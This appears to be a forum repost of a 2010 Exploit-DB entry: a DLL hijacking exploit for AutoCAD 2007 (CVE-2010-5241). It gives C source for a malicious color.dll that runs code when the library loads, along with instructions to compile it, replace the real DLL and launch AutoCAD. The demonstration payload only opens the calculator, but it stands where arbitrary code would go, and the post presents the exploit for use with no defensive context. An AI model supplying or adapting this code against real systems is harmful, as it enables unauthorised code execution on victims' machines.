Exploit Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
14793
Проверка EDB
  1. Пройдено
Автор
XSPLOITED SECURITY
Тип уязвимости
LOCAL
Платформа
WINDOWS
CVE
cve-2010-5241
Дата публикации
2010-08-25
C:
/*
Description: 
A vulnerability exists in windows that allows other applications dynamic link libraries
to execute malicious code without the users consent, in the privelage context of the targeted application.

Title: Autocad 2007 Professional dll (color.dll) Hijacking exploit
Author: xsploited security
URL: http://www.x-sploited.com/
Email: [email protected]

Instructions:

1. Compile dll
2. Replace color.dll in autocad directory with your newly compiled dll
3. Launch Autocad 2007
4. Boom calc!

Shoutz:

kAoTiX, Deca, Drizzle, 0xJeremy, Sheep, SpliT, all other security guru's and teams.
*/

#include <windows.h>

int pwnme()
{
  WinExec("calc", SW_NORMAL);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  pwnme();
  return 0;
}
 
Источник
www.exploit-db.com

Похожие темы